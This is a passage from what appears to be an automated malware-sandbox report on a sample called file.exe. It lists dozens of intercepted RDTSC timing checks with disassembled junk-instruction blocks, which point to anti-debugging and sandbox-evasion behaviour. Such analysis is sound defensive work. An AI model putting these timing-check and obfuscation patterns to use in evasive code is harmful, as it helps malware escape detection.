push eax 0x00000071 push edx 0x00000072 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 992944 second address: 99294A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 99294A second address: 992952 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E5E61 second address: 9E5E8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jc 00007FA4407343D6h 0x0000000c popad 0x0000000d jmp 00007FA4407343DFh 0x00000012 jmp 00007FA4407343DEh 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E5FCB second address: 9E5FD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FA441297126h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E611F second address: 9E6123 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E6123 second address: 9E6127 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E6127 second address: 9E612D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E612D second address: 9E6137 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E6137 second address: 9E613B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E613B second address: 9E6153 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FA441297126h 0x00000008 jmp 00007FA44129712Eh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E6153 second address: 9E6162 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA4407343DBh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E6162 second address: 9E6166 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E6166 second address: 9E616C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E6447 second address: 9E645D instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FA441297126h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jc 00007FA44129712Ch 0x00000010 je 00007FA441297126h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E6716 second address: 9E6722 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E6722 second address: 9E6726 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E6726 second address: 9E672C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E672C second address: 9E673F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA44129712Dh 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E6878 second address: 9E687E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E687E second address: 9E6882 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9EA0EE second address: 9EA0F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9EA0F8 second address: 9EA0FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9EA0FE second address: 9EA102 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9EA102 second address: 9EA117 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA441297131h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9EE6D8 second address: 9EE6E2 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FA4407343D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9EE6E2 second address: 9EE6EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9EE840 second address: 9EE844 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9EEB55 second address: 9EEB5B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9EEB5B second address: 9EEB7A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4407343E7h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9EEB7A second address: 9EEB80 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9EECE0 second address: 9EECE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9EECE6 second address: 9EECEC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9EEFC9 second address: 9EEFDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FA4407343D6h 0x0000000a jnc 00007FA4407343D6h 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9F30D9 second address: 9F30DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9F30DD second address: 9F30E7 instructions: 0x00000000 rdtsc 0x00000002 je 00007FA4407343D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9F5C9C second address: 9F5CA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9F5FC2 second address: 9F5FC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9F5FC6 second address: 9F5FE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007FA44129713Ah 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9FDF9C second address: 9FDFA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FA4407343D6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9FE29E second address: 9FE2A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9FE2A4 second address: 9FE2A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9B3590 second address: 9B359A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FA441297126h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9B359A second address: 9B359E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9B359E second address: 9B35FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push ebp 0x0000000e call 00007FA441297128h 0x00000013 pop ebp 0x00000014 mov dword ptr [esp+04h], ebp 0x00000018 add dword ptr [esp+04h], 0000001Dh 0x00000020 inc ebp 0x00000021 push ebp 0x00000022 ret 0x00000023 pop ebp 0x00000024 ret 0x00000025 and di, C7B9h 0x0000002a push 00000004h 0x0000002c mov edi, ecx 0x0000002e push eax 0x0000002f jmp 00007FA441297135h 0x00000034 pop edx 0x00000035 push eax 0x00000036 push eax 0x00000037 push edx 0x00000038 jnc 00007FA44129712Ch 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9B35FD second address: 9B3602 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9FE541 second address: 9FE54E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9FF003 second address: 9FF036 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4407343E3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007FA4407343E8h 0x0000000f push esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A0300E second address: A0301F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA44129712Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A0301F second address: A03027 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A03027 second address: A0302B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A02528 second address: A0253F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jg 00007FA4407343D6h 0x00000009 jmp 00007FA4407343DAh 0x0000000e pop esi 0x0000000f push esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A027B1 second address: A027D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push edi 0x00000006 push edx 0x00000007 pop edx 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c je 00007FA441297126h 0x00000012 jmp 00007FA44129712Bh 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A02940 second address: A02948 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A02C3A second address: A02C40 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A0D6BB second address: A0D6C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jc 00007FA4407343D6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A0D6C9 second address: A0D6F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jo 00007FA44129713Fh 0x0000000f jmp 00007FA441297133h 0x00000014 jno 00007FA441297126h 0x0000001a push edx 0x0000001b ja 00007FA441297126h 0x00000021 pop edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A0B605 second address: A0B60F instructions: 0x00000000 rdtsc 0x00000002 jg 00007FA4407343D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A0B60F second address: A0B61E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A0B61E second address: A0B636 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jl 00007FA4407343D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FA4407343DCh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A0B7B2 second address: A0B7B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A0B7B8 second address: A0B7E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4407343DEh 0x00000007 jmp 00007FA4407343E4h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A0B7E7 second address: A0B7F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push ecx 0x00000006 pushad 0x00000007 popad 0x00000008 pop ecx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A0B924 second address: A0B929 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A0C4A0 second address: A0C4AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007FA441297126h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A0CAC6 second address: A0CACA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A0CACA second address: A0CADE instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FA441297126h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jbe 00007FA441297126h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A0D050 second address: A0D05F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FA4407343D6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A0D05F second address: A0D063 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A0D38D second address: A0D39D instructions: 0x00000000 rdtsc 0x00000002 ja 00007FA4407343D6h 0x00000008 jbe 00007FA4407343D6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A113AE second address: A113B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A113B2 second address: A113D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 ja 00007FA4407343EFh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A1151F second address: A11545 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FA44129713Bh 0x00000008 pushad 0x00000009 jg 00007FA441297126h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A11664 second address: A11672 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FA4407343D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A11DD7 second address: A11DF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 popad 0x0000000a push edx 0x0000000b jbe 00007FA44129712Eh 0x00000011 pushad 0x00000012 popad 0x00000013 jnp 00007FA441297126h 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A11DF4 second address: A11E08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA4407343E0h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A11F46 second address: A11F6C instructions: 0x00000000 rdtsc 0x00000002 jo 00007FA441297126h 0x00000008 je 00007FA441297126h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jmp 00007FA44129712Bh 0x00000015 popad 0x00000016 jo 00007FA44129714Ch 0x0000001c push eax 0x0000001d push edx 0x0000001e push ecx 0x0000001f pop ecx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A11F6C second address: A11F82 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4407343DAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jg 00007FA4407343D6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A1F5E1 second address: A1F5E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A1F5E5 second address: A1F5FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jc 00007FA4407343D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d jne 00007FA4407343D6h 0x00000013 pushad 0x00000014 popad 0x00000015 pop ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A1F5FF second address: A1F603 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A1DC49 second address: A1DC4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A1DDE5 second address: A1DDF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FA441297126h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A1E060 second address: A1E079 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 jbe 00007FA4407343D6h 0x0000000c jmp 00007FA4407343DCh 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A1E079 second address: A1E0A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA441297136h 0x00000007 push ebx 0x00000008 pushad 0x00000009 popad 0x0000000a pop ebx 0x0000000b pop edx 0x0000000c pop eax 0x0000000d js 00007FA44129712Eh 0x00000013 push ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A1E384 second address: A1E388 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A1F461 second address: A1F467 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A1F467 second address: A1F46D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A1F46D second address: A1F471 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A1F471 second address: A1F48A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007FA4407343DEh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A26FEC second address: A27019 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FA441297126h 0x0000000a jno 00007FA441297126h 0x00000010 popad 0x00000011 jl 00007FA44129713Ch 0x00000017 jmp 00007FA441297136h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A27019 second address: A27050 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop edi 0x00000006 pushad 0x00000007 jnl 00007FA4407343D6h 0x0000000d js 00007FA4407343D6h 0x00000013 jnc 00007FA4407343D6h 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 jmp 00007FA4407343E0h 0x00000026 push eax 0x00000027 pop eax 0x00000028 popad 0x00000029 pushad 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A27050 second address: A27059 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A27059 second address: A27077 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA4407343E9h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A32D93 second address: A32DC3 instructions: 0x00000000 rdtsc 0x00000002 je 00007FA441297126h 0x00000008 jne 00007FA441297126h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 jmp 00007FA441297134h 0x00000016 push edi 0x00000017 pop edi 0x00000018 push eax 0x00000019 pop eax 0x0000001a push ecx 0x0000001b pop ecx 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 pop eax 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A32DC3 second address: A32DC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A32DC7 second address: A32DE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push ebx 0x00000008 pushad 0x00000009 jnl 00007FA441297126h 0x0000000f jmp 00007FA44129712Ah 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A39985 second address: A39995 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4407343DCh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A39995 second address: A3999B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A3999B second address: A399A2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A399A2 second address: A399B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jp 00007FA441297126h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A399B1 second address: A399B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
